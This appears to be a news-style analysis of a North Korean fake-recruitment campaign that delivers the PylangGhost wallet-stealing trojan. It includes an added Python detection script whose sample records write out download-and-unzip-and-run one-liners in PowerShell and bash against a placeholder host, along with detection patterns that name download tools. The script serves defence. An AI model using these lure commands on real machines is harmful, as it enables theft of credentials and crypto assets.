State-sponsored hackers upgrade the 'pig butchering' playbook: PylangGhost Trojan takes precise aim at 80+ wallet extensions
Attack chain: from fake recruitment to a zeroed wallet
This month the North Korean hacker group Famous Chollima (also tracked as Wagemole) has been targeting cryptocurrency professionals in India and other regions, luring victims through counterfeit recruitment sites that impersonate Coinbase, Robinhood and similar companies:
Phishing trap: the fake site copies the real company's logo and job descriptions one-to-one and asks applicants to submit their actual tech stack and email address
Video interview trick: claiming that a 'dedicated driver' must be installed for the interview, the site tricks the victim into pasting and running a malicious command (PowerShell on Windows, Bash on Mac)
Trojan implantation: the command downloads a ZIP archive containing the PylangGhost Trojan; the Python files inside are renamed so that name-based detection does not flag them
Sharp take: this is an overwhelming strike from a higher tier by a state-level APT team, using job offers as bait and wielding technology as the scythe
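Detecting the second and third stages of that chain on an endpoint, as an added example written for this edit rather than code from the article or from any vendor report: the two heuristics run over a few constructed Sysmon-style process-creation records (fields Image, OriginalFileName, CommandLine and ParentImage, as in Sysmon Event ID 1). The paths, the hostname example.invalid and file names such as camdriver.exe are invented for illustration and are not indicators from the campaign.

```python
# Added example: heuristic detection of two delivery-stage behaviours from the
# attack chain above (the pasted download-and-unpack one-liner, and a renamed
# Python interpreter). Editor-written illustration code, not code from the
# original article or from any vendor report. Input records are constructed
# here and mimic Sysmon Event ID 1 (process creation) fields: Image,
# OriginalFileName, CommandLine, ParentImage. Paths and names are invented.
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    image: str               # full path of the executable that started
    original_file_name: str  # OriginalFileName from the PE version resource ("" on macOS)
    command_line: str
    parent_image: str


# Stage 2: the victim pastes a one-liner that fetches and unpacks an archive.
DOWNLOAD_RE = re.compile(r"\b(Invoke-WebRequest|iwr|curl|wget|Start-BitsTransfer)\b", re.I)
ARCHIVE_RE = re.compile(r"\.zip\b|Expand-Archive|\bunzip\b", re.I)
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "bash", "zsh", "sh"}

# Stage 3: renaming python.exe changes the file name on disk but not the PE
# version resource, so OriginalFileName still says python.exe while Image does not.
PYTHON_ORIGINAL_NAMES = {"python.exe", "pythonw.exe"}


def basename(path: str) -> str:
    """Last path component, accepting both Windows and POSIX separators."""
    return re.split(r"[\\/]", path)[-1]


def is_lure_oneliner(ev: ProcEvent) -> bool:
    """A shell whose command line both downloads something and handles a ZIP archive."""
    return (basename(ev.image).lower() in SHELLS
            and DOWNLOAD_RE.search(ev.command_line) is not None
            and ARCHIVE_RE.search(ev.command_line) is not None)


def is_renamed_interpreter(ev: ProcEvent) -> bool:
    """Process whose PE metadata says it is Python but whose on-disk name says otherwise."""
    orig = ev.original_file_name.lower()
    return orig in PYTHON_ORIGINAL_NAMES and basename(ev.image).lower() != orig


def classify(events):
    """Return (rule, image) pairs for every event that trips a heuristic, in input order."""
    findings = []
    for ev in events:
        if is_lure_oneliner(ev):
            findings.append(("lure_oneliner", ev.image))
        if is_renamed_interpreter(ev):
            findings.append(("renamed_interpreter", ev.image))
    return findings


# Constructed sample telemetry (not real indicators): a Windows lure one-liner,
# a Mac lure one-liner, one renamed interpreter, one legitimate Python run and
# one benign PowerShell command.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "PowerShell.EXE",
              r'powershell -c "iwr https://example.invalid/driver.zip -OutFile $env:TEMP\d.zip; '
              r'Expand-Archive $env:TEMP\d.zip $env:TEMP\drv; $env:TEMP\drv\camdriver.exe"',
              r"C:\Program Files\Google\Chrome\Application\chrome.exe"),
    ProcEvent("/bin/bash", "",
              'bash -c "curl -o /tmp/d.zip https://example.invalid/driver.zip && unzip /tmp/d.zip -d /tmp/drv"',
              "/Applications/Google Chrome.app/Contents/MacOS/Google Chrome"),
    ProcEvent(r"C:\Users\alice\AppData\Local\Temp\drv\camdriver.exe", "python.exe",
              r"camdriver.exe update.py", r"C:\Windows\System32\cmd.exe"),
    ProcEvent(r"C:\Python312\python.exe", "python.exe",
              r"python.exe build.py", r"C:\Windows\explorer.exe"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "PowerShell.EXE",
              "powershell -c Get-Process", r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for rule, image in classify(SAMPLE_EVENTS):
        print(f"{rule:20s} {image}")
```

Running the block flags the two pasted one-liners and the renamed interpreter while leaving the normal Python and PowerShell runs alone. The renamed-interpreter check relies on Sysmon populating OriginalFileName from the PE version resource, which a plain rename does not touch; an attacker who strips or patches that resource defeats it, so it is a cheap first filter rather than a standalone control, and the macOS record (no PE metadata) is only caught by the lure heuristic.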
Open slaughter: 80+ wallet extensions exposed, on-chain assets moved in an instant
PylangGhost's three core capabilities, all aimed at the victim's core assets:
Credential siphon: it harvests the stored data of more than 80 browser extensions such as MetaMask and TronLink, extracting seed phrases, private keys and password manager contents
Screen monitoring: captures transaction pages and 2FA codes in real time and combines this with keystroke logging to reconstruct the victim's every action
Cross-platform: the Python variant infects Windows and the GolangGhost variant infects Mac; Linux has not been observed as a target so far